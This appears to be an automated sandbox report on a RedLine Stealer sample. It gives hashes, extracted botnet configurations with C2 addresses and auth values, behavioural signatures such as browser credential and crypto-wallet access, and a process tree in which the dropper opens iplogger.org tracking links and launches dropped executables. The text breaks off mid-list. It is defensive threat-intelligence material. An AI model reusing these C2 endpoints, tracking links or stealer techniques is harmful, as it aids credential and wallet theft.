Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-08-2022 06:08

General

  • Target

    b35d335e9261e963bca114d269140695.exe

  • Size

    907KB

  • MD5

    b35d335e9261e963bca114d269140695

  • SHA1

    8f2b1ead99ae43690ecd29e6f16022d53d91d280

  • SHA256

    e450f635c564bda4d1c22e0d9d4763f582c70a3806d54a3733a0bcc12edb3884

  • SHA512

    eca4c239e588103243d2ee9f6d5958a81665c48594d96446dfd91202b90c3a83dd45da0c03350f2fd5b3388ec67eb6d6217e4781ee3d9a638599cbc2842166df

Malware Config

Extracted

Family

redline

Botnet

nam3

C2

103.89.90.61:34589

Attributes
  • auth_value

    64b900120bbceaa6a9c60e9079492895

Extracted

Family

redline

Botnet

5

C2

176.113.115.146:9582

Attributes
  • auth_value

    d38b30c1ccd6c1e5088d9e5bd9e51b0f

Extracted

Family

redline

Botnet

@tag12312341

C2

62.204.41.144:14096

Attributes
  • auth_value

    71466795417275fac01979e57016e277

Extracted

Family

redline

Botnet

5076357887

C2

195.54.170.157:16525

Attributes
  • auth_value

    0dfaff60271d374d0c206d19883e06f3

Extracted

Family

redline

Botnet

RuXaRR_GG

C2

insttaller.com:40915

Attributes
  • auth_value

    4a733ff307847db3ee220c11d113a305

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 15 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Program Files directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b35d335e9261e963bca114d269140695.exe
    "C:\Users\Admin\AppData\Local\Temp\b35d335e9261e963bca114d269140695.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:4928
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1AbtZ4
      2⤵
      • Adds Run key to start application
      • Enumerates system info in registry
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:3180
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9e7a146f8,0x7ff9e7a14708,0x7ff9e7a14718
        3⤵
          PID:4532
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
          3⤵
            PID:4528
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4460
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
            3⤵
              PID:1500
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
              3⤵
                PID:4020
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                3⤵
                  PID:5204
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
                  3⤵
                    PID:5416
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
                    3⤵
                      PID:5724
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:1
                      3⤵
                        PID:5792
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
                        3⤵
                          PID:5936
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
                          3⤵
                            PID:6040
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
                            3⤵
                              PID:1900
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
                              3⤵
                                PID:5768
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
                                3⤵
                                  PID:6400
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
                                  3⤵
                                    PID:6456
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7052 /prefetch:8
                                    3⤵
                                      PID:6564
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 /prefetch:8
                                      3⤵
                                        PID:4504
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                        3⤵
                                        • Drops file in Program Files directory
                                        PID:5240
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff6828e5460,0x7ff6828e5470,0x7ff6828e5480
                                          4⤵
                                            PID:1840
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6072 /prefetch:8
                                          3⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1404
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6484 /prefetch:8
                                          3⤵
                                            PID:6412
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5180 /prefetch:2
                                            3⤵
                                              PID:4136
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
                                              3⤵
                                                PID:6736
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1
                                                3⤵
                                                  PID:6664
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1
                                                  3⤵
                                                    PID:2860
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,2868214998322270985,7394891978059663217,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6608 /prefetch:8
                                                    3⤵
                                                      PID:6964
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RyjC4
                                                    2⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1328
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0x9c,0x104,0x7ff9e7a146f8,0x7ff9e7a14708,0x7ff9e7a14718
                                                      3⤵
                                                        PID:5100
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11765500661903162827,16649773579073280951,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
                                                        3⤵
                                                          PID:2396
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,11765500661903162827,16649773579073280951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
                                                          3⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2144
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A4aK4
                                                        2⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4132
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9e7a146f8,0x7ff9e7a14708,0x7ff9e7a14718
                                                          3⤵
                                                            PID:4120
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,14954178641198711802,8531003236166980500,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
                                                            3⤵
                                                              PID:5036
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,14954178641198711802,8531003236166980500,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
                                                              3⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1368
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RLtX4
                                                            2⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1732
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7ff9e7a146f8,0x7ff9e7a14708,0x7ff9e7a14718
                                                              3⤵
                                                                PID:772
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,14005713142274474593,18320206790581760031,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2
                                                                3⤵
                                                                  PID:4644
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,14005713142274474593,18320206790581760031,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 /prefetch:3
                                                                  3⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4536
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1RCgX4
                                                                2⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:2824
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e7a146f8,0x7ff9e7a14708,0x7ff9e7a14718
                                                                  3⤵
                                                                    PID:892
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,9229846095156798369,7094954314883405175,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                                                                    3⤵
                                                                      PID:472
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,9229846095156798369,7094954314883405175,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
                                                                      3⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4456
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1nhGL4
                                                                    2⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:4984
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,10869527961285210585,5262034780321510693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
                                                                      3⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:5760
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1A3AZ4
                                                                    2⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:3848
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0x104,0x114,0x7ff9e7a146f8,0x7ff9e7a14708,0x7ff9e7a14718
                                                                      3⤵
                                                                        PID:4032
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1ALSZ4
                                                                      2⤵
                                                                        PID:644
                                                                      • C:\Program Files (x86)\Company\NewProduct\F0geI.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:5544
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 1520
                                                                          3⤵
                                                                          • Program crash
                                                                          PID:7160
                                                                      • C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:5820
                                                                      • C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
                                                                        "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:6028
                                                                      • C:\Program Files (x86)\Company\NewProduct\real.exe
